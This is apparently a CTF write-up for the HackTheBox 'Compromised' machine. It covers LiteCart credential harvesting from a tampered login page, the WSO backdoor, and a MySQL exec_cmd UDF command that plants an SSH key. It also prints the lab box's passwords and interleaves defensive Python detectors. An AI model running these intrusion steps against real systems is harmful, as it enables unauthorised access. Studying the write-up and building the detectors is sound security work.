[Write Up][Hackthebox] Compromised
Hello, this is my write-up for the “Compromised” machine.
Reconnaissance and Enumeration
As usual, I start by digging for information about this machine, using nmap for port scanning.
nmap -sV -sC -v -p- --min-rate=10000 -oN nmap.initial 10.10.10.207
The scan found ports for SSH and HTTP. When I tried to access the root of the website, I was redirected to /shop.
Apparently, this website uses the LiteCart CMS. After searching for information about this CMS, I found that it has an authenticated RCE vulnerability.
Let's save that for later, since I don't have any credentials yet.
Next, let's fuzz the root directory of the website.
wfuzz -c -w ~/payloads/big.txt -u "http://10.10.10.207/FUZZ" --hc 404 -t 100
Okay, I found a backup folder. It is indeed a very interesting folder: it contains a zip file, which turns out to be a backup of the shop/ folder.
Inside it I found something interesting in the file shop/admin/login.php:
-------------------------- [snip - snip] --------------------------
header('X-Robots-Tag: noindex');
document::$snippets['head_tags']['noindex'] = '<meta name="robots" content="noindex" />';

if (!empty(user::$data['id'])) notices::add('notice', language::translate('text_already_logged_in', 'You are already logged in'));

if (isset($_POST['login'])) {
  //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
  user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
}

if (empty($_POST['username']) && !empty($_SERVER['PHP_AUTH_USER'])) $_POST['username'] = !empty($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : '';
-------------------------- [snip - snip] --------------------------
When I checked the file shop/admin/.log2301c9430d8593ae.txt, I found that it stores credentials for this website: the (now commented-out) file_put_contents line above had been writing every username and password submitted to the admin login into that hidden file.
My next step is gaining access using the public exploit together with the credentials I just obtained.
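The tampering pattern here, a login handler that copies the submitted credentials into a hidden file next to itself, is worth turning into a check. The Python below is an added example, not the author's code and not part of LiteCart: it scans PHP source for lines where a write-or-send function receives credential fields taken from the request (reporting commented-out hits too, since a logger switched off after harvesting is still evidence), and filters a webroot listing down to hidden text or log files like the one above. The PHP sample and the file listing inside it are constructed to mirror the snippet in this write-up.

```python
"""Spot credential-exfiltrating tampering in PHP login handlers (added example)."""
import re

# Constructed sample modelled on the tampered login.php shown in the write-up.
SAMPLE_LOGIN_PHP = r'''<?php
header('X-Robots-Tag: noindex');
if (isset($_POST['login'])) {
  //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
  user::login($_POST['username'], $_POST['password'], $redirect_url, false);
}
'''

# Functions that move data out of the request: to disk, to a log, or to the network.
SINK_RE = re.compile(
    r'\b(file_put_contents|fwrite|fputs|error_log|mail|curl_exec|fopen)\s*\(', re.I)
# Request fields that carry credentials.
CRED_RE = re.compile(
    r'\$_(POST|GET|REQUEST|SERVER)\s*\[\s*[\'"]'
    r'(user(name)?|pass(word|wd)?|pwd|PHP_AUTH_USER|PHP_AUTH_PW)[\'"]\s*\]', re.I)
# Line-leading comment markers; commented-out hits are reported, not ignored.
COMMENT_RE = re.compile(r'^\s*(//|#|/\*|\*)')


def scan_login_source(source):
    """Return (lineno, sink_function, is_commented) for every line on which a
    data sink and a credential field from the request appear together."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        sink = SINK_RE.search(line)
        if sink and CRED_RE.search(line):
            findings.append((lineno, sink.group(1), bool(COMMENT_RE.match(line))))
    return findings


# A dot-file with a text/log extension anywhere under the webroot.
HIDDEN_FILE_RE = re.compile(r'(^|/)\.[^/]+\.(txt|log|dat)$')


def suspicious_webroot_files(paths):
    """Filter a webroot listing down to hidden text/log files, which a CMS has
    no business writing next to its admin scripts."""
    return sorted(p for p in paths if HIDDEN_FILE_RE.search(p))


# Constructed listing of the shop/ tree, including the drop file named in the PHP.
SAMPLE_LISTING = [
    "shop/admin/login.php",
    "shop/admin/.log2301c9430d8593ae.txt",
    "shop/.htaccess",
    "shop/includes/config.inc.php",
]

if __name__ == "__main__":
    for lineno, sink, commented in scan_login_source(SAMPLE_LOGIN_PHP):
        state = "commented out" if commented else "active"
        print(f"line {lineno}: {sink}() receives credential fields ({state})")
    for path in suspicious_webroot_files(SAMPLE_LISTING):
        print("hidden drop file:", path)
```

On a real tree, feed scan_login_source the contents of each .php file and suspicious_webroot_files a recursive listing; diffing the backup archive against the deployed copy is the same idea in a different form, and is exactly how the stray log file surfaced here.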
Gaining Access (www-data)
When I tried to upload a shell, I didn't get the expected response. It looks like the PHP functions used to execute shell commands are disabled, so I am going to use the WSO backdoor here.
Okay, since the machine uses PHP 7.2, I found a public exploit that can bypass the disabled functions.
When I tried a reverse shell, I couldn't get any response. It turned out that this machine uses iptables and only allows ports 80 and 22:
# Generated by iptables-save v1.6.1 on Mon May 11 02:27:29 2020
*filter
:INPUT DROP [6:1032]
:FORWARD DROP [0:0]
:OUTPUT DROP [5:394]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -m tcp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -m tcp -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -m tcp -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -m tcp -j ACCEPT
COMMIT
# Completed on Mon May 11 02:27:29 2020
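The dump explains the failed reverse shell, but reading a ruleset by hand is error-prone. As an added example that is not part of the write-up, the Python below parses the filter table above (embedded verbatim so it runs offline) and reports which inbound ports accept new TCP connections and whether any new outbound connection can leave the host at all. Only TCP port matches and the RELATED,ESTABLISHED state rule are modelled; that is all this ruleset uses.

```python
"""Summarize what an iptables-save dump actually permits (added example)."""
import re

# The filter table exactly as dumped in the write-up, embedded so the example runs offline.
IPTABLES_SAVE = """\
# Generated by iptables-save v1.6.1 on Mon May 11 02:27:29 2020
*filter
:INPUT DROP [6:1032]
:FORWARD DROP [0:0]
:OUTPUT DROP [5:394]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -m tcp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -m tcp -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -m tcp -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -m tcp -j ACCEPT
COMMIT
# Completed on Mon May 11 02:27:29 2020
"""


def parse_iptables_save(text):
    """Return ({chain: policy}, {chain: [rule, ...]}) for the dump's filter table."""
    policies, rules = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#*" or line == "COMMIT":
            continue
        if line.startswith(":"):            # ":INPUT DROP [6:1032]" -> chain, default policy
            chain, policy = line[1:].split()[:2]
            policies[chain] = policy
            rules[chain] = []
        elif line.startswith("-A "):        # "-A CHAIN <matches> -j TARGET"
            chain = line.split()[1]
            rules.setdefault(chain, []).append(line)
    return policies, rules


def _accept_tcp_ports(chain_rules, flag):
    """TCP ports named by `flag` (--dport or --sport) in the ACCEPT rules of one chain."""
    found = []
    for rule in chain_rules:
        m = re.search(rf"{flag} (\d+)", rule)
        if m and "-p tcp" in rule and rule.endswith("-j ACCEPT"):
            found.append(int(m.group(1)))
    return sorted(found)


def summarize(text):
    """Answer the questions an operator asks of a host firewall."""
    policies, rules = parse_iptables_save(text)
    inbound = _accept_tcp_ports(rules.get("INPUT", []), "--dport")
    egress_dports = _accept_tcp_ports(rules.get("OUTPUT", []), "--dport")
    egress_sports = _accept_tcp_ports(rules.get("OUTPUT", []), "--sport")
    # A NEW outbound connection leaves from an ephemeral source port and is not yet
    # RELATED/ESTABLISHED, so it only passes if an OUTPUT ACCEPT rule names its
    # destination port or the chain policy is ACCEPT. --sport rules only cover replies.
    new_egress_blocked = policies.get("OUTPUT") == "DROP" and not egress_dports
    return {
        "policies": policies,
        "inbound_new_tcp_ports": inbound,
        "outbound_new_tcp_dports": egress_dports,
        "outbound_reply_sports": egress_sports,
        "new_outbound_connections_blocked": new_egress_blocked,
    }


if __name__ == "__main__":
    for key, value in summarize(IPTABLES_SAVE).items():
        print(f"{key}: {value}")
```

For this ruleset the answer is: INPUT and OUTPUT both default to DROP, new inbound TCP is accepted only on 22 and 80, and no OUTPUT rule accepts a new connection by destination port, so a reverse connection from an ephemeral source port is dropped before it leaves the box. That is why the foothold later comes back in over SSH on 22 rather than calling out. As a hardening measure this default-deny egress policy is cheap and did exactly what it was meant to do.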
Gaining Access (mysql)
Now what? Let's enumerate this machine once again. This time I found a very suspicious file in the MySQL plugin directory: libmysql.so isn't supposed to exist there by default. Checking the mysql.func table, I found a function named exec_cmd. Apparently, this function executes a command. So I am going to put my public key on this machine using exec_cmd:
select cast(exec_cmd("id;mkdir -p ~/.ssh; echo XXXXXX >> ~/.ssh/authorized_keys") as CHAR CHARACTER SET utf8)
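A UDF registered in mysql.func runs inside mysqld with the service account's privileges, so a stray shared object in the plugin directory is a finding in its own right. The Python below is an added example (not the author's code) that compares the registered UDFs and the plugin directory against a baseline listing taken from a clean install of the same server version. The rows, the directory listing and the baseline are constructed: exec_cmd and libmysql.so mirror what was found on this box, while the other file names are assumptions standing in for legitimate plugins. The sys_exec and sys_eval names come from the widely distributed lib_mysqludf_sys library and are included as a name-based signature.

```python
"""Audit MySQL user-defined functions against a known-good plugin directory (added example)."""
import re

# Constructed rows as returned by: SELECT name, dl FROM mysql.func;
FUNC_ROWS = [
    ("exec_cmd", "libmysql.so"),
]
# Constructed listing of the plugin directory on the suspect host (assumed names,
# apart from libmysql.so which the write-up found).
PLUGIN_DIR = ["auth_socket.so", "libmysql.so", "mysql_no_login.so", "validate_password.so"]
# Constructed baseline: the same listing taken from a clean install of the same version.
BASELINE = {"auth_socket.so", "mysql_no_login.so", "validate_password.so"}

# UDF names associated with OS command execution from the database engine.
SUSPICIOUS_NAMES = re.compile(r"^(sys_exec|sys_eval|sys_get|sys_set|exec_cmd)$", re.I)


def audit_udfs(func_rows, plugin_files, baseline):
    """Return (subject, shared_object, [reasons]) for every registered UDF or
    plugin file that deviates from the baseline."""
    findings = []
    present = set(plugin_files)
    for name, dl in func_rows:
        reasons = []
        if dl not in baseline:
            reasons.append("backed by shared object not in baseline")
        if dl not in present:
            # Registration outlives the file: still worth knowing who created it.
            reasons.append("shared object missing from plugin dir")
        if SUSPICIOUS_NAMES.match(name):
            reasons.append("name matches command-execution UDF")
        if reasons:
            findings.append((f"udf:{name}", dl, reasons))
    for so in sorted(present - baseline):
        findings.append((f"file:{so}", so, ["unexpected file in plugin dir"]))
    return findings


if __name__ == "__main__":
    for subject, so, reasons in audit_udfs(FUNC_ROWS, PLUGIN_DIR, BASELINE):
        print(f"{subject} ({so}): {'; '.join(reasons)}")
```

In practice the inputs come from `SELECT name, dl FROM mysql.func;` and a listing of the directory reported by `SHOW VARIABLES LIKE 'plugin_dir';`. Keeping that directory unwritable by the mysql account and granting the FILE privilege sparingly are what stop a database-level compromise from becoming command execution as the service user, which is precisely the step that happens next in this write-up.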
Gaining Access (sysadmin)
There are so many strange files in the mysql home directory.
Okay, since I was getting tired, I simply searched for passwords with grep, and somehow that turned up a password for sysadmin.
Here is my command (with --exclude-dir, which is the option that actually skips those directories during a recursive search):
grep -rnwi "password" --exclude-dir={sys,root,proc,dev}
The password for sysadmin is:
3*NLJE32I$Fe
And I got the user flag.
Gaining Access (root)
After enumerating many more times, I found a suspicious file whose timestamp falls between the creation of the sysadmin user and the release of the machine.
When I reverse engineered this file, I found a backdoor variable. Apparently, this variable holds the password for root:
zlke~U3Env82m2-
And then I got the root flag!
LinkedIn: Dimas Fariski Setyawan Putra
Twitter & Github: @nyxsorcerer